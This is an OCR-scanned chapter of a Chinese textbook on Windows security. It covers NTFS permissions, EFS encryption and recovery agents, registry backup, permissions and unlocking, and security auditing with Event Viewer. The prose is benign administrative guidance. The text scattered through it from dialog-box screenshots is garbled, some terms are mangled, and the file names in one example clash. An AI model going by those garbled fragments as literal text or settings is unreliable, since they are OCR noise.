@ Atninistrater (ADMIN-DS4ABS4DA\Adninistrator) 
名 Adninistrators DMIN-DS4AB54DA\Adninistrators) 
最 srsrm 


RUsers nmFrnstMss4DAvUsers) 


应 加 四 )- 
a ul) ER) 


特别 权限 或 高 级 设置 ， 请 单 击 “高 级 ”. 


[mm | me | Wr 


7-14 ”权限 的 两 个 状态 
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当 一 个 分 区 被 格式 化 为 NTFS 之 后 , Windows 2000 系统 会 自动 将 Everyone 组 赋予 对 该 
分 区 的 根 文件 夹 的 完全 控制 权限 。Everyone 组 是 Windows 2000 中 的 一 个 内 置 系统 组 ， 所 
有 访问 资源 的 用 户 自 动 成 为 Everyone 组 的 成 员 ， 而 不 管用 户 是 否 属 于 某 个 组 。 这 个 默认 设 
置 对 于 系统 安全 来 说 是 一 个 重大 的 隐患 ， 所 以 我 们 应 该 在 安装 完 系统 后 第 一 时 间 把 
Everyone 组 删除 掉 。 

人 ”NTFS 权限 的 继承 性 

授予 父 文件 夹 的 任何 权限 将 应 用 于 包含 在 该 文件 夹 中 的 子 文件 夹 和 文件 。 当 你 授予 访 
问 某 个 文件 夹 的 NTFS 权限 时 ， 就 将 授予 该 文件 夹 的 NTFS 权限 授予 了 该 文件 夹 中 任何 现 
有 的 文件 和 子 文件 夹 ， 以 及 在 该 文件 夹 中 创建 的 任何 新 的 文件 和 文件 夹 。 

可 以 阻止 权限 的 继承 ,也 就 是 阻止 子 文件 从 父 文件 夹 继 承 权 限 。 为 了 阻止 权限 的 继承 ， 
需 删 除 继承 来 的 权限 ， 只 保留 被 明确 授予 的 权限 。 

当 一 个 文件 夹 向 另 一 个 文件 夹 复制 (移动 ) 文 件 或 文件 夹 时 ， 或 者 从 一 个 磁盘 分 区 向 另 

-个 磁盘 分 区 复制 (移动 ) 文 件 或 文件 夹 时 , 这 些 文件 或 文件 夹具 有 的 NTFS 权限 会 发 生 不 同 

的 变化 ， 表 7-8 显示 了 这 些 变 化 。 


表 7-8 NTF 权限 变化 
动作 同一 个 NTFS 分 区 内 不 同 的 NTFS 分 区 之 间 从 NTFS 分 区 到 FAT 分 区 


NTFS 权限 的 设置 ， 请 参考 第 12 章 的 实 训 十 三 :Windows 文件 系统 安全 配置 。 

3. 加 密 文件 系统 (EFS) 

加 密 文件 系统 (Encrypting File System，EFS) 提 供 一 种 核心 的 文件 加 密 技 术 ， 能 对 存储 
在 NTFS5 分 区 上 的 文件 进行 加 密 (NTFS5 分 区 指 由 Windows 2000/XP/2003 格式 化 过 的 
NTES 分 区 ， 而 由 Windows NT4 格式 化 的 NTFS 分 区 是 NTFS4 格式 的 ， 虽 然 同样 是 NTFS 
文件 系统 ， 但 它 不 支持 EFS 加 密 )。 

EFS 加 密 是 基于 公 钥 策略 的 。 在 使 用 EFS 加 密 一 个 文件 或 文件 夹 时 ， 系 统 首先 会 生成 

-个 由 伪 随 机 数组 成 的 文件 加 密 钥 匙 (File Encryption Key，FEK)， 人 然后 将 利用 FEK 和 数据 

扩展 标准 XIODESX) 算 法 创建 加 密 后 的 文件 ， 并 把 它 存储 到 硬盘 上 ， 同 时 删除 未 加 密 的 原始 
文件 。 随 后 系统 利用 你 的 公 钥 加 密 FEK， 并 把 加 密 后 的 FEK 存储 在 同一 个 加 密 文件 中 。 而 
在 访问 被 加 密 的 文件 时 ,系统 首先 利用 当前 用 户 的 私 钥 解密 FEK， 然 后 利用 FEK 解密 出 文 
件 。 在 首次 使 用 EFS 时 ， 如 果 用 户 还 没有 公 钥 / 私 钥 对 (统称 为 密 钥 )， 则 会 首先 生成 密 钥 ， 
然后 加 密 数 据 。 如 果 你 登录 到 了 域 环境 中 ， 密 钥 的 生成 依赖 于 域 控制 器 ， 否 则 它 就 依赖 于 
本 地 计算 机 。 密 钥 对 是 由 操作 系统 根据 用 户 的 安全 标识 符 (SID) 来 生成 的 ，SID 的 唯一 性 保 
证 了 密 钥 对 的 唯一 性 。 密 钥 对 中 的 公 钥 通过 EFS 证 书 进行 保护 。 

EFS 加 密 机 制 和 操作 系统 紧密 结合 ， 因 此 我 们 不 必 为 了 加 密 数 据 安装 额外 的 软件 ， 这 
节约 了 我 们 的 使 用 成 本 。EFS 加 密 系统 对 用 户 是 透明 的 。 这 也 就 是 说 ， 如 果 你 加 密 了 一 些 
数据 ， 那 么 你 对 这 些 数据 的 访问 将 是 完全 允许 的 ， 并 不 会 受到 任何 限制 。 而 其 他 非 授权 用 


EBA 


户 试 图 访问 加 密 过 的 数据 时 ， 就 会 收 到 “拒绝 访问 ”的 错误 提示 。EFS 加 密 的 用 户 验 证 过 
程 是 在 登录 Windows 时 进行 的 ， 只 要 登录 到 Windows,， 就 可 以 打开 任何 一 个 被 授权 的 加 密 
文件 。 

使 用 EFS 类 似 于 使 用 文件 和 文件 夹 上 的 权限 。 两 种 方法 都 可 用 于 限制 数据 的 访问 ， 然 
而 ， 未 经 许可 对 加 密 的 文件 和 文件 夹 进行 物理 访问 的 入 侵 者 将 无 法 读 取 这 些 文件 和 文件 夹 
中 的 内 容 。 如 果 入 侵 者 试图 打开 或 复制 已 加 密 的 文件 或 文件 夹 ， 将 收 到 拒绝 访问 消息 。 文 
件 和 文件 夹 上 的 权限 不 能 防止 未 授权 的 物理 攻击 (例如 为 了 非法 获得 重要 数据 而 重新 安装 
操作 系统 ， 并 以 新 的 管理 员 身 份 给 自己 指派 权限 )。 

对 于 想 加 密 的 文件 或 文件 夹 ， 单 击 鼠 标 右键 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 
在 “常规 ”选项 卡 下 单 击 “ 高 级 ”按钮 ， 之 后 在 弹出 的 对 话 框 中 选中 “加 密 内 容 以 便 保 护 
数据 ” 复 选 框 ， 然 后 单 击 “确定 ”按钮 ， 等 待 片刻 数据 就 加 密 好 了 。 如 果 你 加 密 的 是 一 个 
文件 夹 ， 系 统 还 会 询问 你 ， 是 把 这 个 加 密 属性 应 用 到 文件 夹 上 ， 还 是 文件 夹 以 及 内 部 的 所 
有 子 文件 夹 。 按 照 你 的 实际 情况 来 操作 即 可 。 人 解密 数据 也 是 很 简单 的 ， 同 样 是 按照 上 面 的 
方法 ， 取 消 选 中 “加 密 内 容 以 便 保护 数据 ” 复 选 框 ， 然 后 单 击 “ 确 定 ”按钮 ， 如 图 7-15 所 示 。 


Ee) 请 选择 用 于 该 文件 夹 的 设置 。 
， 机 


文 
存档 和 编制 索引 属性 
口 可 以 存档 文件 夹 &) 
回 为 了 快速 搜索 ， 允 许 索引 服务 蝙 刺 六 文件 来 的 索引 GD) 
压 纪 或 加 密 属性 

压缩 内 容 以 便 节省 磁盘 裤 间 C) 

包 因 可 二 容 以 信保 护 数据 在 ] 


图 7-15 用 EFS 加 密 文件 夹 
如 果 你 不 喜欢 图 形 界面 的 操作 ， 还 可 以 在 命令 行 模式 下 用 “cipher” 命 令 完成 对 数据 的 
加 密 和 解密 操作 ， 至 于 “cipher ”命令 更 详细 的 使 用 方法 则 可 以 通过 在 命令 符 后 输入 
“cipher/?” 并 按 Enter 键 获得 。 
在 使 用 EFS 加 密 文件 和 文件 夹 时 ， 以 下 几 点 值得 注意 。 
e ”如 果 把 未 加 密 的 文件 复制 到 具有 加 密 属性 的 文件 夹 中 , 这 些 文 件 将 会 被 自动 加 密 。 
。 ”若是 将 加 密 数 据 移出 来 ， 如 果 移 动 到 NTFS 分 区 上 ， 数 据 依旧 保持 加 密 属性 ， 如 
果 移 动 到 FAT 分 区 上 ， 这 些 数 据 将 会 被 自动 解密 。 
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e ”被 EFS 加 密 过 的 数据 不 能 在 Windows 中 直接 共享 。 如 果 通 过 网 络 传输 经 EFS 加 
密 过 的 数据 ， 这 些 数据 在 网 络 上 将 会 以 明文 的 形式 传输 。 

e NTFS 分 区 上 保存 的 数据 还 可 以 被 压缩 ， 不 过 一 个 文件 不 能 同时 被 压缩 和 加 密 。 

。 ”Windows 的 系统 文件 和 系统 文件 夹 无 法 被 加 密 。 

EFS 加 密 系 统 中 ， 还 有 故障 恢复 代理 这 一 概念 。 故 障 恢复 代理 是 指 获 得 授权 解密 由 其 
他 用 户 加 密 的 数据 的 个 人 。 如 果 由 于 磁盘 故障 、 火 灾 或 其 他 原因 永久 丢失 文件 加 密 证 书 和 
相关 私 钥 ， 指 定 为 故障 恢复 代理 的 人 员 就 可 以 恢复 数据 。 举 例 来 说 ， 公 司 财务 部 的 一 个 职 
工 加 密 了 财务 数据 的 报表 ， 某 天 这 位 职工 辞职 了 ， 为 了 安全 起 见 你 直接 删除 了 这 位 职工 的 
帐户 。 直 到 有 一 天 需要 用 到 这 位 职工 创建 的 财务 报表 时 才 发 现 这 些 报表 是 被 加 密 的 ， 而 用 
户 帐户 已 经 删除 ， 这 些 文件 无 法 打开 了 。 不 过 只 要 有 故障 恢复 代理 的 存在 就 可 以 解决 这 个 
问题 。 因 为 被 EFS 加 密 过 的 文件 ， 除 了 加 密 者 本 人 之 外 还 有 故障 恢复 代理 可 以 打开 。 

对 于 Windows 2000/2003 来 说 ， 在 单机 和 工作 组 环境 下 ， 默 认 的 恢复 代理 是 
Administrator。Windows XP 在 单机 和 工作 组 环境 下 没有 默认 的 恢复 代理 。 而 在 域 环 境 中 就 
完全 不 同 了 ， 所 有 加 入 域 的 Windows 计算 机 ， 默 认 的 恢复 代理 全 部 是 域 管理 员 。 

EFS 故障 恢复 代理 的 设置 ， 请 参考 第 12 章 的 实 训 十 三 : Windows 文件 系统 安全 配置 。 


7.2.3 注册 表 安 全 


注册 表 是 管理 配置 系统 运行 参数 的 一 个 核心 数据 库 ， 针 对 注册 表 的 一 次 错误 的 操作 可 
能 会 对 操作 系统 造成 不 可 挽回 的 破坏 ， 病 毒 、 特 洛 伊 木马 和 其 他 的 恶意 软件 通常 也 会 通过 
扰乱 注册 表 来 给 系统 造成 破坏 ， 比 如 增加 启动 值 项 等 。 下 面 首先 介绍 注册 表 的 一 些 基础 知 
识 ， 然 后 介绍 注册 表 的 安全 防范 措施 。 

1. 注册 表 基 础 


早期 的 图 形 操作 系统 ， 如 Windows 3.x 中 ， 对 软 、 硬 件 工 作 环境 的 配置 是 通过 对 扩展 
名 为 .ini 的 文件 进行 修改 来 完成 的 ， 但 ini 文件 管理 起 来 很 不 方便 ， 因 为 每 种 设备 和 应 用 程 
序 都 得 有 自己 的 ini 文件 , 并且 在 网 络 上 难以 实现 远程 访问 。 为 了 克服 上 述 这 些 问 题 , 微软 
公司 从 Windows 95 开始 (至 目前 最 新 的 Windows Vista) 采 用 了 一 种 叫做 “注册 表 ” 的 数据 
库 来 进行 统一 管理 。 在 该 数据 库 中 整合 集成 了 全 部 系统 和 应 用 程序 的 初始 化 信息 ， 其 中 包 
含 了 硬件 设备 的 说 明 、 相 互 关联 的 应 用 程序 与 文档 文件 、 窗 口 显 示 方 式 、 网 络 连接 参数 、 
关系 到 计算 机 安全 的 网 络 共享 设置 。 它 与 Win32 系统 里 的 ini 文件 相 比 ， 具 有 方便 管理 、 
安全 性 较 高 、 适 于 网 络 操作 等 特点 。 
在 形式 上 ， 注 册 表 与 ini 文件 有 两 个 显著 的 特点 。 
。 ”注册 表 采 用 的 是 二 进 制 形式 登录 数据 , 而 ini 文件 采用 的 则 是 简单 的 文本 形式 登录 
数据 。 
。 ”注册 表 支 持 子 关键 字 ， 各 级 子 关键 字 都 有 自己 的 “ 键 值 ”， 而 ini 文件 中 则 支持 节 
以 及 节 中 的 参数 。 
在 功能 上 ， 注 册 表 与 ini 文件 相 比 ， 主 要 有 以 下 三 个 特点 。 
。 ”注册 表 允 许 对 硬件 、 某 些 操作 系统 参数 、 应 用 程序 和 设备 驱动 程序 进行 跟踪 配置 ， 
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这 使 得 某 些 配置 的 改变 可 以 在 不 重新 启动 系统 的 情况 下 立即 生效 。 
。 ”注册 表 中 登录 的 硬件 部 分 数据 可 以 用 来 支持 Windows 的 即 插 即 用 特性 。 当 
Windows 检测 到 计算 机 上 的 各 种 设备 时 ， 就 把 有 关 数 据 保存 到 注册 表 中 。 通 常 是 
在 安装 时 进行 这 种 检测 的 ， 但 Windows 启动 或 原 有 配置 改变 时 ， 也 要 进行 检测 。 
如 安装 一 个 新 的 硬件 时 ，Windows 将 检查 注册 表 ， 以 便 确定 哪些 资源 已 被 占用 ， 
这 样 就 可 以 避免 新 设备 与 原 有 设备 之 间 的 资源 冲突 。 
。 ”通过 注册 表 ， 管 理 人 员 和 用 户 可 以 在 网 络 上 检查 系统 的 配置 和 设置 ， 使 得 远程 管 
理 得 以 实现 。 
注册 表 采 用 “关键 字 ” 及 其 “ 键 值 ”来 描述 记录 项 及 其 数据 。 所 有 的 关键 字 都 是 以 
“HKEY” 作 为 前 级 开头 。 实 际 上 ， 关 键 字 是 一 个 句柄 。 这 种 约定 使 得 应 用 程序 开发 人 员 
可 以 在 使 用 注册 表 API 时 把 它 用 于 程序 之 中 。 为 此 ，Windows 提供 了 若干 API 函数 ， 以 便 
在 开发 Windows 应 用 程序 时 添加 、 修 改 、 查 询 和 删除 注册 表 的 记录 项 。 关 键 字 可 以 分 为 两 
类 : 一 类 是 由 系统 定义 的 ， 通 常 称 为 “预定 义 关 键 字 ”; 另 一 类 是 由 应 用 程序 定义 的 ， 安 
装 的 应 用 软件 不 同 ， 其 记录 项 也 就 不 同 。 我 们 可 以 在 注册 表 编 辑 器 (如 图 7-16 所 示 ) 中 很 方 
便 地 添加 、 修 改 、 查 询 和 删除 注册 表 的 每 一 个 关键 字 。 注 册 表 编 辑 器 采用 树 型 结构 组 织 注 
册 表 中 的 数据 ， 我 们 可 以 将 注册 表 里 的 内 容 分 为 树枝 和 树叶 ， 树 枝 下 可 以 有 多 个 树枝 ， 也 
可 以 有 多 个 树叶 。 这 个 树枝 ， 我 们 把 它 叫做 “ 键 ”， 树 叶 叫 做 “ 键 值 ”。 键 值 包括 三 部 分 : 
值 的 名 称 、 值 的 数据 类 型 和 值 本 身 。 我 们 可 以 选择 “开始 ”|“ 运 行 ”命令 ， 在 打开 的 对 话 
框 中 输入 命令 regedit 来 打开 注册 表 编 辑 器 。 


注册 表 编辑 器 


名 称 类 型 数据 
国 区 内 REG_SZ 做 值 未 设 置 ) 


由 国 HKEY_CURRENT_VSER 较 Proxyznable REG_IWORD 0x00000000 (0) 
由 国 HKEY_LDCAL MACHINE 加 


由 国 HKEY_VSERS 
日 园 HKEY_CURRENT_CONFIG 
日 全 Software 
国 Fonts 
日 Microsoft 
日 外 windows 
日 园 CurrentYersion 
人 Internet Settings 
由 国 Systen 


电脑 \HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings 


图 7-16 注册 表 编 辑 器 
Windows 系统 的 注册 表 预 定义 一 般 有 五 个 主 关键 字 ， 其 描述 如 表 7-9 所 示 。 
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表 7-9 注册 表 预 定义 主 关 键 字 


主 关键 字 描 述 

它 是 HREY LOCAL MACHINE\SOFTWARE 的 子 键 。 此 处 存储 的 信 
息 可 以 确保 当 使 用 Windows 资源 管理 器 打开 文件 时 ， 打 开 正 确 的 关联 
程序 

包含 当前 登录 用 户 的 配置 信息 。 用 户 文件 夹 、 屏 幕 颜 色 和 控制 面板 的 
设置 存储 在 此 处 。 该 信息 被 称 为 用 户 配置 文件 

包含 针对 该 计算 机 (对 于 任何 用 户 ) 的 配置 信息 

包含 计算 机 上 所 有 用 户 的 配置 文件 。HKEY_CURRENT USER 是 
HKEY USERS 的 子 键 

包含 本 地 计算 机 在 系统 启动 时 所 用 的 硬件 配置 文件 信息 


注册 表 键 值 项 数据 可 分 为 六 种 类 型 ， 其 描述 如 表 7-10 所 示 。 
表 7-10 ”注册 表 键 位 项 的 数据 类 型 


HKEY CLASSES ROOT 


HKEY _ CURRENT USER 


HKEY LOCAL MACHINE 


HRKEY USERS 


HKEY CURRENT_ CONFIG 


数据 类 型 描 述 
REG BINARY 原始 二 进 制 数据 
REG DWORD 数据 由 4 字 节 长 的 数 表示 
REG EXPAND SZ 长 度 可 变 的 数据 串 
REG MULTI SZ 多 重 字 符 串 
REG SZ 固定 长 度 的 文本 字符 串 
REG FULL RESOURCE DESCRIPTOR 一 系列 嵌 套 数组 


2. 注册 表 的 备份 与 恢复 

修改 注册 表 配 置 可 以 改善 系统 性 能 、 增 强 系统 安全 性 。 但 是 ， 由 于 注册 表 中 存放 的 某 
些 信息 对 系统 运行 来 说 是 至 关 重 要 的 ， 一 旦 在 修改 过 程 中 出 现 误 操 作 ， 有 可 能 带 来 致命 的 
问题 ， 所 以 在 修改 注册 表 之 前 一 定 要 先 备 份 。 只 有 做 了 备份 ， 才 能 在 因为 修改 注册 表 而 导 
致 系统 出 现 问题 时 ， 使 用 注册 表 的 恢复 功能 来 恢复 系统 到 正常 的 状态 。 

注册 表 的 备份 和 恢复 的 具体 步骤 如 下 。 

(1) 选择 “开始 ”|“ 运 行 ”命令 在 打开 的 对 话 框 中 输入 命令 regedit 来 打开 注册 表 编 
辑 器 。 

(2) 在 “注册 表 编辑 器 ”窗口 中 选择 “文件 ”菜单 下 的 “导出 ”命令 ， 如 图 7-17 所 示 。 

(3) 在 “导出 注册 表 文 件 ” 对 话 框 中 选择 存放 注册 表 备 份 文件 的 位 置 并 且 输入 文件 的 
名 称 ， 然 后 单 击 “ 保 存 ” 按 钮 ， 一 个 注册 表 备份 文件 便 生 成 了 。 

(4) 若 要 利用 刚才 生成 的 注册 表 备 份 文件 来 恢复 注册 表 ， 可 在 “注册 表 编辑 器 ”窗口 
中 选择 “文件 ”菜单 下 的 “导入 ”命令 。 

(5) 在 “导入 注册 表 文 件 ” 对 话 框 中 定位 到 存放 注册 表 备份 文件 的 位 置 ， 选 择 已 经 备 
份 好 的 注册 表 文 件 ， 单 击 “ 打 开 ” 按 钮 即 可 ， 如 图 7-18 所 示 。 
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查找 范围 中 ;| 四 我 9 文档 
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文件 名 中: ll23.reg 
文件 类 型 0)， [注册 文件 @ re 


图 7-18 ”导入 注册 表 文 件 
3. 注册 表 的 访问 控制 


注册 表 中 包含 有 关 计 算 机 及 其 应 用 程序 和 文件 的 敏感 信息 。 恶 意 用 户 或 程序 可 以 通过 
修改 注册 表 来 达到 破坏 计算 机 的 目的 。 因 此 ， 注 册 表 的 高 度 安全 是 至 关 重 要 的 。 默 认 情 况 
下 ， 注 册 表 的 安全 级 别 是 比较 高 的 。 只 有 管理 员 才 对 整个 注册 表 拥 有 完全 访问 权限 ， 一 般 
用 户 无 权 访问 与 其 他 用 户 帐 户 的 注册 表 项 。 对 给 定 注册 表 项 拥有 适当 权限 的 用 户 可 以 修改 
该 项 及 其 子 项 的 权限 。 为 注册 表 项 指派 权限 的 具体 操作 步骤 如 下 。 

(1) 选择 “开始 ” | 运行” 命令， 在 打开 的 对 话 框 中 输入 命令 regedit 来 打开 注册 表 编 
辑 器 。 

(2) 在 注册 表 编辑 器 中 选 定 准备 指派 权限 的 项 。 

(G3) 从 “编辑 ”菜单 中 选择 “权限 ”命令 ， 打 开 权 限 设 置 对 话 框 ， 如 图 7-19 所 示 。 

(4) 选择 用 户 或 组 名 称 ， 并 给 其 指派 访问 权限 。 
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如 果 要 授予 用 户 读 取 该 项 内 容 的 权限 ， 但 不 保存 对 文件 的 修改 ， 请 选中 “ 读 取 
的 “允许 ” 复 选 框 。 


Internet Settings 的 权限 


strator (ADMIN-D54NBS4DA\Adni +o) 
hdministrators tye strators 三 
给 cazArof omaER 
给 power Vsers DMTN-DS4ASS4DA\Power Vsers) 


< 
添加 四 )..- 


四 
口 


Adninistrator 的 权限 下) 


特别 权限 到 高 级 设置 ， 请 单 击 “ 高 级 ”。 
图 7-19 注册 表 权限 设置 对 话 框 


e ”如果 要 授予 用 户 打开 、 编 辑 所 选项 和 获得 所 有 权 的 权限 ， 请 选中 “完全 控制 ”的 


“允许 ” 复 选 框 。 
。 ”如 果 要 授予 用 户 对 所 选项 的 特别 权限 ， 请 单 击 “ 高 级 ”按钮 。 
(5) ”如果 要 给 子 项 指派 权限 ， 并 希望 指派 给 父 项 的 可 继承 权限 能 够 应 用 于 子 项 ， 请 单 
击 “ 高 级 ”按钮 并 在 打开 的 高 级 安全 设置 对 话 框 中 选中 “从 父 项 继承 那些 可 以 应 用 到 子 对 
象 的 权限 项 目 ， 包 括 那 些 在 此 明确 定义 的 项 目 ” 复 选 框 ， 如 图 7-20 所 示 。 
Settings 的 高 级 安全 设置 


| 要 “| 而 柜 “| 所 有 者 有 效 权限 | 
要 想 查看 有 关 “ 特 殊 权 限 ” 的 详细 信息 ， 请 选择 一 个 权限 项 目 ， 然 后 单 击 “ 编 辑 ”. 


Pover Users WD 
Administrators 
ST 


Adninistrator ( 
CREATOR OWNER 


编辑 到) 
回 从 父 项 继承 那些 可 以 应 用 到 子 对 象 的 权限 项 目 ， 包 括 那些 在 此 明确 定义 的 项 目 I)。 
口 用 在 此 显示 的 可 以 应 用 到 子 对 象 的 项 目 普 代 所 有 子 对 象 的 权限 项 目 下 ) 


二 


7-20 ”高 级 安全 设置 对 话 框 
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4. 注册 表 的 解锁 

对 于 注册 表 的 安全 , 您 除了 需要 掌握 “注册 表 的 备份 
与 恢复 ”、“ 注 册 表 的 访问 控制 ”这 两 项 基本 措施 以 外 ， 注 间 才 纺 每 
掌握 注册 表 的 解锁 操作 也 是 一 项 基本 技能 。 因 为 现在 的 一 @ 注册 纺 和 已 祝 芝 理 
些 恶 意 程序 不 仅仅 修改 注册 表 , 而 且 为 了 防止 您 恢复 注册 

会 禁止 使 用 注册 表 ， 当 执行 regedit 这 一 命令 时 ， 如 果 

系统 弹出 一 个 消息 框 : “注册 编辑 已 被 管理 员 停 用 ”， 这 图 7-21 注册 表 被 锁定 
时 注册 表 编 辑 器 已 被 锁定 ， 如 图 7-21 所 示 。 

解锁 注册 表 有 以 下 两 种 方法 。 

方法 一 : 利用 注册 表 文 件 解锁 注册 表 

1) 针对 Windows 2000/2003 系统 

(1) 选择 “开始 ” |“ 程序” |“ 附件 ”命令 ， 从 展开 的 子 菜单 中 找到 “记事 本 ”命令 并 
执行 它 。 
(2) 在 记事 本 窗口 中 输入 以 下 内 容 : 

Windows Registry Editor Version 5.00 

[HKEY_ CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Sy 

stem] "DisableRegistryTools"=dword:00000000 

(G3) 从 “文件 ”菜单 中 选择 “保存 ”命令 ， 保 存 类 型 ; 所 有 文件 ， 文 件 名 : ***.Ieg， 
其 中 *** 随 便 起 名 。 在 此 假设 保存 到 C 盘 ， 文 件 名 为 123.reg。 
(4) 打开 “资源 管理 器 ”， 切 换 到 C 盘 ， 双 击 “123.reg” 文 件 。 
(5) 这 时 系统 弹出 “是 否 确 认 要 将 C:\123.reg 中 的 信息 添加 进 注册 表 ? ”的 对 话 框 ， 
单 击 “是 ”按钮 。 
(6) 随后 弹出 对 话 框 “C:\reg.reg 里 的 信息 已 被 成 功 地 输入 注册 表 ”， 表 明 导 入 成 功 。 
单 击 “确定 ”按钮 关闭 对 话 框 。 

2) 针对 Windows XP 系统 

(1) 选择 “开始 ”|“ 程 序 ”|“ 附 件 ” 命 令 ， 从 展开 的 子 菜单 中 找到 “记事 本 ”命令 并 
执行 它 。 

(2) 在 记事 本 窗口 中 输入 以 下 内 容 : 


Windows Registry Editor Version 5.00 


[HKEY_CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Sy 
stem] "DisableRegistryTools"=dword:00000000 


注意 : 第 一 行 下面 有 1 空 行 ， 所 有 内 容 输 完 后 请 再 按 Enter 键 ， 即 在 dword:00000000 后 面 
再 按 Enter 键 ， 新 建 一 个 空 行 。 


(3) 从 “文件 ”菜单 中 选择 “保存 ”命令 ,保存 类 型 为 所 有 文件 ， 文 件 名 : ***.reg， 


其 中 *** 随 便 起 名 。 
(4) 选择 “开始 ”|“ 运 行 ” 命令， 打开 “运行 ”对 话 框 ， 输 入 reg import 加 刚才 保存 
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的 文件 名 (包括 路 径 )， 如 刚才 的 文件 保存 在 C:\reg 文件 夹 下 文件 名 是 1.reg， 那 么 就 输入 : 


reg import c:\reg\1.reg。 


如 果 文 件 路 径 或 文件 名 中 有 空格 ， 请 在 路 径 和 文件 名 两 边 加 上 引号 ， 例 如 : 

reg import "c:\reg\l.reg" 

方法 二 : 利用 组 策略 解锁 注册 表 

(1) 在 Windows 2000/XP/2003 中 ,选择 “开始 ”|“ 运 行 ”命令 , 打开 “运行 ”对 话 框 ， 
输入 Gpedit.Msc 后 按 Enter 键 ， 打 开 “ 组 策略 ”窗口 ， 如 图 7-22 所 示 。 
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图 7-22 “组 策略 ”窗口 


(2) 在 “组 策略 ”窗口 中 ， 依 次 展开 “用 户 配 置 ” 一 “管理 模板 ”一 “系统 ”节点 ， 
双击 右 侧 窗口 中 的 “阻止 访问 注册 表 编 辑 工具 ”， 如 图 7-23 所 示 。 
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加 果 这 个 设置 被 局 用， 并 且 用 户 试图 
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般 关 闭 findors Update 设备 驱动 程序 搜索 提示 
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(3) 在 弹出 的 对 话 框 中 选中 “已 禁用 ” 单 选 按钮 ， 如 图 7-24 所 示 ， 单 击 “ 确 定 ” 按 钮 
后 退出 “组 策略 ”窗口 ， 即 可 为 注册 表 解 锁 。 
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7-24 “阻止 访问 注册 表 编 辑 工具 属性 ”对 话 框 


7.2.4 审核 与 日 志 


要 维护 真正 安全 的 环境 ， 仅 仅 具备 安全 系统 还 远 远 不 够 。 如 果 总 是 假设 自己 不 会 受到 
攻击 ， 或 认为 防护 措施 已 足以 保护 自己 的 安全 ， 都 将 是 非常 危险 的 。 要 维护 系统 安全 ， 必 
须 进 行 主动 监视 ， 以 检查 是 否 发 生 了 入 侵 和 攻击 。 

Windows 安全 审核 可 以 用 日 志 的 形式 记录 下 与 安全 相关 的 事件 ， 可 以 使 用 其 中 的 信息 
来 生成 一 个 有 规律 活动 的 概要 文件 ， 发 现 和 跟踪 可 疑 事件 ， 并 留 下 关于 某 一 入 侵 者 活动 的 
有 效 证 据 。Windows 2000/XP/2003 系统 提供 了 九 类 可 以 审核 的 事件 ， 如 图 7-25 所 示 ， 对 于 
每 一 类 都 可 以 审核 其 是 成 功 事件 ， 还 是 失败 事件 ， 或 是 两 者 都 审核 ， 如 图 7-26 所 示 。 
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图 7-25 Windows 审核 事件 
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7-26 ”Windows 审核 操作 


以 上 审核 事件 和 审核 操作 可 以 通过 选择 “控制 面板 ”一 “管理 工具 ”一 “本 地 安全 策 
略 ”一 “审核 策略 ”选项 ， 打 开 “ 审 核 策略 ”对 话 框 进行 设置 。 

设置 了 审核 策略 后 ， 审 核 所 产生 的 结果 都 被 记录 到 日 志 中 ， 日 志 记录 了 审核 策略 监控 
的 事件 成 功 或 执行 失败 的 信息 。 为 了 便于 管理 ， 日 志 被 分 为 六 种 ， 分 别 是 应 用 程序 日 志 、 
系统 日 志 、 安 全 日 志 、 目 录 服务 日 志 、 文件 复制 日 志和 DNS 服务 日 志 。 前 三 种 是 所 有 安装 
了 Windows 2000/XP/2003 的 系统 都 存在 的 ， 而 后 三 种 则 仅 当 安装 了 相应 的 服务 后 才 提供 。 

使 用 事件 查看 器 可 以 查看 日 志 的 内 容 ， 基 本 步骤 如 下 。 

(1) 选择 “开始 ” |“ 程序” |“ 管理 工具 ”|“ 事 件 查看 器 ”命令 ， 打 开 “ 事 件 查看 器 ” 
窗口 。 

(2) 在 “事件 查看 器 ”窗口 左 侧 窗 格 中 单 击 “ 安 全 性 ”， 则 在 右 侧 的 窗 格 中 显示 日 志 
的 条 目 列表 ， 以 及 每 一 条 日 志 的 摘要 信息 ， 包 括 日 期 、 事 件 、 来 源 、 分 类 、 用 户 和 计算 机 
名 。 成 功 的 事件 前 显示 一 个 钥 是 图标， 而 失败 的 事件 显示 锁 的 图 标 ， 如 图 7-27 所 示 。 

加 事件 查看 器 


文件 四 ， 操作 从 查看 中 帮助 人 0 
和 + 知 | 四 | 从 加 加 岛 


成 功 审核 站 帐户 
. 

: 成 功 审核 下 14:24:19 。 Security 

系 


7-27 “事件 查看 器 ”窗口 
(3) 如 果 想 查看 某 一 条 日 志 的 详细 信息 ， 双 击 选择 该 项 上 日志， 或 是 选择 一 条 日 志 后 
列 ”选择 “操作 ”菜单 中 的 “属性 ”命令 。 
(4) 如 果 要 查看 某 一 指定 类 型 的 事件 ， 或 是 某 一 时 间 段 内 发 生 的 事件 ， 或 是 某 一 用 户 
的 事件 ， 就 需要 运用 事件 查看 器 的 查找 功能 ， 事 件 查 看 器 的 查找 对 话 框 如 图 7-28 所 示 。 
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在 本 地 安全 性 上 查找 


还 原 默 认 值 @) 


图 7-28 事件 查看 器 的 查找 对 话 框 


(5) 如 果 想 在 事件 查看 器 的 事件 列表 窗 格 中 只 列 出 符合 相应 条 件 的 事件 ， 这 时 需 用 得 
选 功能 ， 事 件 查看 器 的 筛选 对 话 框 如 图 7-29 所 示 。 


[EW | 
事件 类 型 
回 号 息 区 j 
回 敬 省 如 
回 鲁 误 四 ) 


事件 来 源 QD) 

类 别 中 

事件 IDm) 

用 户 四): 

计算 机 如); 

从 中: | 第 一 个 事件 。 六 
到 由; | 最 后 一 个 事件 立 


| 


7-29 ”事件 查看 器 的 筛选 对 话 框 


(6) 随 着 审核 事件 的 不 断 增加 ， 安 全 日 志文 件 的 大 小 也 不 断 增 加 。 当 安全 日 志文 件 的 
大 小 达到 其 极限 时 ， 之 后 发 生 的 安全 事件 将 无 法 记录 到 日 志 当 中 。 因 此 ， 安 全 日 志文 件 大 
小 的 设置 也 至 关 重要 ， 我 们 可 以 通过 类 似 于 图 7-30 所 示 的 对 话 框 进行 设置 。 

在 Windows 系统 中 使 用 审核 策略 ， 虽 然 不 能 对 用 户 的 访问 进行 控制 ， 但 是 管理 员 通过 
